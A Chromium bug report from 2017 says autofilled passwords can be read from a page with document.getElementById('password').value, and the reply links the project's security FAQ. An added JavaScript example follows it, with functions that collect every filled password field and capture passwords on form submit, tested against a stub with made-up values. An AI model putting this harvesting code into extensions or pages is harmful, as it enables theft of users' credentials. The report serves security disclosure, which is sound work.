Security: Method of bypassing user-protected password area.
Reported by dominic....@gmail.com, Oct 4 2017
Issue description
VULNERABILITY DETAILS
Asking for the user's account password is rendered void and bypassable by this extremely easy-to-do tactic.
VERSION
Chrome Version: Version 61.0.3163.100 (Official Build) (64-bit)
Operating System: Windows 10
REPRODUCTION CASE
Instead of trying to view the user's password in the list, you would do the following:
1. Visit website login page - or click "logout" on website
2. Using Inspect Element, simply obtain the Password Element's ID once Autocomplete has run.
3. In the console, use document.getElementById("password").value - with "password" being the element ID.
4. You now have their password.
This could be exploited by addons that have gone rogue to name one of a million use cases.
SUGGESTIONS
Using a genuine Password mask and not just an input mask.
On form post or button click, silently replace the password with the genuine one - this could even be done internally in Chrome so that the user's password never actually hits the visible web page when inserted by Autocomplete.
Oct 4 2017
Please see https://chromium.googlesource.com/chromium/src/+/master/docs/security/faq.md#What-about-unmasking-of-passwords-with-the-developer-tools
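The reproduction steps in the report, generalized to every password field on a page and to capturing at submit time as well, as an added example that is not from the bug report or from Chromium. It is plain page-context JavaScript of the kind a content script could run, which is the "rogue addon" case the reporter mentions and the reason the linked FAQ treats the filled field as already inside the page's trust boundary. The names harvestPasswordFields, captureOnSubmit and makeStubDocument are chosen here, and the stub DOM, its selector handling and the credential values in it are constructed so the block runs under Node; in a browser console you would pass document instead of the stub.

```javascript
// Added example, not code from the bug report or from Chromium.
// Reads every autofilled password field reachable from `root`. `root` only
// needs querySelectorAll, so this works against the real `document` (or one
// form element) in a browser and against the constructed stub below in Node.
function harvestPasswordFields(root) {
  const results = [];
  for (const el of root.querySelectorAll('input[type="password"]')) {
    // Skip fields the browser has not filled and the user has not typed into.
    if (!el.value) continue;
    results.push({
      id: el.id || null,
      name: el.name || null,
      form: el.form && el.form.action ? el.form.action : null,
      value: el.value,
    });
  }
  return results;
}

// Also capture at submit time, when a user-typed password is guaranteed to be
// present; `sink` receives one entry per filled password field. Returns a
// function that detaches the listener.
function captureOnSubmit(form, sink) {
  const handler = () => {
    for (const entry of harvestPasswordFields(form)) sink(entry);
  };
  form.addEventListener('submit', handler);
  return () => form.removeEventListener('submit', handler);
}

// Constructed stand-in for a login form so the block runs offline. The only
// selector it understands is the one used above, dispatchEvent takes a bare
// event type rather than an Event object, and all values are made up.
function makeStubDocument() {
  const listeners = {};
  const form = {
    action: 'https://example.test/login',
    addEventListener(type, fn) {
      (listeners[type] = listeners[type] || []).push(fn);
    },
    removeEventListener(type, fn) {
      listeners[type] = (listeners[type] || []).filter((f) => f !== fn);
    },
    dispatchEvent(type) {
      for (const fn of listeners[type] || []) fn({ type });
    },
  };
  const inputs = [
    { type: 'text', id: 'username', name: 'user', value: 'alice', form },
    { type: 'password', id: 'password', name: 'pass', value: 'hunter2', form }, // "autofilled"
    { type: 'password', id: 'otp', name: 'otp', value: '', form }, // not filled
  ];
  form.querySelectorAll = (sel) => inputs.filter((i) => sel === `input[type="${i.type}"]`);
  return { form, querySelectorAll: form.querySelectorAll };
}

// Stand-alone demonstration: live page in a browser, constructed stub in Node.
const root = typeof document !== 'undefined' ? document : makeStubDocument();
console.log(harvestPasswordFields(root));
```

Against the stub this returns the one filled field, {id: "password", name: "pass", form: "https://example.test/login", value: "hunter2"}, and the empty "otp" field is skipped; in a browser it returns whatever Chrome has already written into the page's password inputs, which is exactly the value the reporter reads with document.getElementById("password").value.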
Comment 1 Deleted